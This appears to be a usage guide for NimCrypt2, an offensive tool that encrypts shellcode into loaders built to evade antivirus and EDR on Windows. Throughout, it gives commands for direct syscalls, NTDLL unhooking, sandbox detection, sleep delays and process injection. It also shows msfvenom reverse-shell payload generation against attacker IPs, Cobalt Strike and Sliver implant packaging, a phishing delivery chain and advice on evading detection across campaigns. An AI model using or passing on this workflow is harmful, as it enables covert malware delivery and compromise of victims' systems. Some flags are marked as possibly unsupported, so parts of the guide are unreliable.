NimCrypt2

NimCrypt2 is a post-exploitation framework written in Nim that encrypts shellcode and packs PE files with multiple evasion techniques including AES encryption, direct syscalls, NTDLL unhooking, and sandbox detection. It’s designed to bypass EDR solutions and deliver payloads undetected on Windows systems.

Installation

Prerequisites

Install Nim compiler and build tools:

# On Windows with Chocolatey
choco install nim mingw

# On macOS with Homebrew
brew install nim

# On Linux, use your package manager or download from nim-lang.org
apt-get install nim gcc mingw-w64

Clone and Setup

# Clone the NimCrypt2 repository
git clone https://github.com/icyguider/NimCrypt2.git
cd NimCrypt2

# Install Nim dependencies via nimble
nimble install -d

# Build the tool
nim c -d:release src/NimCrypt2.nim
# Output: NimCrypt2.exe in current directory

Building from Source

# Debug build (faster compilation, larger binary)
nim c -d:debug src/NimCrypt2.nim

# Release build (optimized, smaller binary, slower to compile)
nim c -d:release --opt:size src/NimCrypt2.nim

# Cross-compile for x64 from x86 build
nim c -d:release --cpu:amd64 src/NimCrypt2.nim

Quick Start

Basic Shellcode Encryption

# Encrypt shellcode and create loader executable
NimCrypt2.exe -f shellcode.bin -o output.exe

# With all evasion techniques enabled
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES -u -s -sleep 5000

Generating Shellcode Input

Create shellcode payloads from various frameworks:

# Metasploit Framework
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shellcode.bin

# CobaltStrike aggressor script output to file
# beacon> rportfwd [port] [ip] [port]
# Save beacon shellcode as SC.bin

# Sliver C2 (open-source Cobalt Strike alternative)
sliver > generate --mtls 192.168.1.100:8888 --save-to shellcode.bin

Input Options

Option	Purpose	Example
-f <file>	Path to raw shellcode file (required)	-f payload.bin
-t <process>	Target process name for injection	-t svchost.exe
-r	Enable remote thread injection	-r
-m <addr>	Manual base address override	-m 0x140000000

Specifying Shellcode Input

# From Metasploit
NimCrypt2.exe -f meterpreter.bin -o loader.exe

# From CobaltStrike (stageless)
NimCrypt2.exe -f beacon.bin -o stager.exe -t explorer.exe

# From manual shellcode dump
NimCrypt2.exe -f custom_payload.bin -o custom.exe

Encryption Options

AES Encryption

# Default AES-CTR encryption
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES

# AES with custom key (auto-generated if not specified)
# Key is embedded in compiled binary automatically
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES -k 32

XOR Encryption (Lighter Alternative)

# XOR encryption (faster, smaller file)
NimCrypt2.exe -f shellcode.bin -o output.exe -e XOR

# Multi-pass XOR
NimCrypt2.exe -f shellcode.bin -o output.exe -e XOR -k 4

Key Generation and Management

# Nim code for custom key generation (advanced)
import nimcrypto

let key = newSeq[byte](32)
# Key automatically embedded during compilation

Execution Methods

Local Process Injection

# Inject into current process
NimCrypt2.exe -f shellcode.bin -o output.exe

# Allocate memory, write shellcode, execute
# Uses NtAllocateVirtualMemory → NtWriteVirtualMemory → NtCreateThreadEx

Remote Process Injection

# Inject into remote process (e.g., explorer.exe)
NimCrypt2.exe -f shellcode.bin -o output.exe -t explorer.exe

# Inject with specific target by PID (if supported)
NimCrypt2.exe -f shellcode.bin -o output.exe -t 1234

Remote Thread Creation

# Create remote thread in target process
NimCrypt2.exe -f shellcode.bin -o output.exe -t svchost.exe -r

# Execution flow:
# 1. Open target process handle
# 2. Allocate RWX memory remotely
# 3. Write encrypted shellcode
# 4. Decrypt in-memory
# 5. Create remote thread pointing to shellcode

Hollow Process (PE Hollowing)

# Replace legitimate process image (if supported in build)
NimCrypt2.exe -f shellcode.bin -o output.exe -t notepad.exe -hollow

Direct Syscalls

Native API Calls

NimCrypt2 uses direct syscall invocation to bypass EDR hooks:

# Core syscalls utilized by NimCrypt2:
# NtAllocateVirtualMemory - allocate executable memory
# NtWriteVirtualMemory - write shellcode to memory
# NtCreateThreadEx - create execution thread
# NtProtectVirtualMemory - change memory protection flags
# NtQueryVirtualMemory - query memory properties

Custom Syscall Integration

# Compiled directly into binary with no IAT entries
# EDRs cannot hook what doesn't appear in import tables

# Syscalls dynamically resolved at runtime via SSN (Syscall Service Number)
# Survives NTDLL instrumentation and hooking attempts

Avoiding Import Address Table

# Generated executable contains NO standard Windows API imports
# GetProcAddress/LoadLibrary calls eliminated
# All syscalls embedded directly in compiled Nim code

Unhooking

Enable NTDLL Unhooking

# Replace hooked NTDLL with clean copy from disk
NimCrypt2.exe -f shellcode.bin -o output.exe -u

# Process:
# 1. Load NTDLL from disk into new section
# 2. Replace in-memory NTDLL with disk copy
# 3. Bypass EDR kernel callbacks
# 4. Execute via clean syscall stubs

Manual Unhooking Verification

# Check if NTDLL is hooked (in generated code)
proc isHooked(addr: pointer): bool =
  # Examine first bytes of function
  # Look for JMP/CALL instructions (indicators of hooks)
  true

Sandbox Evasion

Enable Sandbox Detection

# Activate all sandbox checks before execution
NimCrypt2.exe -f shellcode.bin -o output.exe -s

# Checks performed:
# - Domain join status (skip if workgroup)
# - Processor core count (fail if < 2)
# - Physical memory (fail if < 4GB)
# - Username anomalies (skip if "WDAGUtility" or "Guest")
# - Registry artifacts (Hyper-V, VMware, VirtualBox)
# - Disk size checks (fail if < 30GB)

Individual Evasion Checks

# Domain check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-domain

# Memory check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-memory

# Username check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-user

Custom Sandbox Detection

# Example check (pseudo-code)
if getProcessorCount() < 2:
  quit()  # Exit if less than 2 cores (likely VM)

if getTotalMemory() < 4 * 1024 * 1024 * 1024:
  quit()  # Exit if less than 4GB RAM

Sleep Obfuscation

Delayed Execution

# Sleep 5 seconds before executing shellcode
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 5000

# Measured in milliseconds
# 1000 = 1 second, 60000 = 1 minute
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 30000

Purpose of Sleep Obfuscation

Defeats automated malware analysis by delaying execution:

# Sleep through detection window in sandbox
# 30-60 second delay bypasses typical 10-20s analysis timeout
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 60000 -u -s

Output Options

Executable Format

# Generate standalone EXE (default)
NimCrypt2.exe -f shellcode.bin -o payload.exe

# Generate DLL (if supported)
NimCrypt2.exe -f shellcode.bin -o payload.dll -format dll

# Generate reflective DLL
NimCrypt2.exe -f shellcode.bin -o payload.dll -format reflective

Output Customization

# Specify output directory
NimCrypt2.exe -f shellcode.bin -o C:\temp\loader.exe

# Output with custom entrypoint name
NimCrypt2.exe -f shellcode.bin -o output.exe -entry main

Integration Examples

Metasploit Integration

# Generate Meterpreter shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o meter.bin

# Encrypt and pack with NimCrypt2
NimCrypt2.exe -f meter.bin -o agent.exe -e AES -u -s -sleep 5000

# Execute on target
# agent.exe → connects to 10.10.10.10:4444

CobaltStrike Integration

# Export beacon from CobaltStrike as raw shellcode
# Artifact Kit → set format to "raw"

# Process with NimCrypt2
NimCrypt2.exe -f beacon.bin -o evasive_beacon.exe -e AES -u -t svchost.exe -r

# Deliver via initial access method
# Phishing → payload.exe → reverse shell

Sliver C2 Integration

# Generate Sliver implant
sliver > generate --mtls 192.168.1.100:8888

# Extract shellcode
# sliver > generate --save-to sliver.bin --format shellcode

# Package with NimCrypt2
NimCrypt2.exe -f sliver.bin -o sliver_loader.exe -e AES -u -s

Cobalt Strike BOF (Beacon Object File)

# Convert BOF to shellcode first
# BOF → shellcode conversion tool required

NimCrypt2.exe -f bof_payload.bin -o bof_loader.exe -r -t explorer.exe

Troubleshooting

Issue	Cause	Solution
”Invalid shellcode file”	File doesn’t exist or wrong path	Verify file path and use absolute paths
Compilation errors	Nim not installed	Run choco install nim or use package manager
EDR still detecting	Evasion techniques inactive	Use -e AES -u -s -sleep 5000 flags together
”Sandbox detected”	Running in VM	Test on bare-metal machine or disable -s flag
Output EXE won’t execute	Shellcode format incorrect	Verify shellcode with msfvenom -p windows/x64/shell_reverse_tcp
NTDLL unhooking fails	System DLL corrupted	Run on patched system or skip -u flag
Process injection timeout	Target process terminating	Use more stable target like svchost.exe

Common Build Issues

# "nim: command not found"
# Solution: Add Nim to PATH or reinstall

# "error: undeclared identifier"
# Solution: Run 'nimble install -d' to fetch missing dependencies

# "compilation hangs"
# Solution: May be normal for release builds - wait 10-30 minutes

Best Practices

Operational Security

• Always test payloads in isolated lab environment first
• Use different encryption keys for each campaign
• Rotate shellcode generators between operations
• Implement sleep obfuscation in all production payloads
• Combine NTDLL unhooking with direct syscalls for maximum evasion
• Never run generated payloads on your own machine

Payload Development

# Layer multiple evasion techniques
NimCrypt2.exe -f shellcode.bin -o final.exe \
  -e AES \
  -u \
  -s \
  -sleep 15000 \
  -t svchost.exe \
  -r

Detection Avoidance

• Vary command-line arguments between campaigns
• Randomize sleep duration (avoid predictable patterns)
• Use process injection into legitimate Windows processes
• Implement junk code and string obfuscation at Nim level
• Monitor your tool’s detection rate on VirusTotal

Output Verification

# Verify shellcode format before packing
file shellcode.bin  # Should be "data"

# Test on isolated VM with AV disabled first
# Then test with real EDR products installed

# Verify execution with Wireshark or netcat listener
nc -lvnp 4444  # Wait for reverse shell callback

Related Tools

Tool	Purpose	Comparison
ScareCrow	Shellcode loader with IAT/syscall obfuscation	Similar evasion, older maintenance
Freeze	Process image encryption and obfuscation	More obfuscation, less flexible injection
PEzor	PE packer with NTDLL unhooking	Bash-based, similar feature set
Donut	In-memory .NET assembly loader	For .NET payloads, different use case
shhhloader	Shellcode loader with advanced obfuscation	Newer project, similar goals
Themida/WinLicense	Commercial PE packer	Professional-grade, cost-prohibitive
ConfuserEx	.NET obfuscator	For managed code only

When to Use Each Tool

• NimCrypt2: Flexible shellcode encryption with direct syscall support
• ScareCrow: Legacy campaigns, simpler requirements
• Freeze: Maximum obfuscation for long-running implants
• PEzor: Bash-compatible build pipelines
• Donut: When payload is .NET executable or PowerShell